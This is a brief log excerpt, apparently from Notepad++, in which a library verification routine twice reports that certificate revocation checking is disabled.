VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled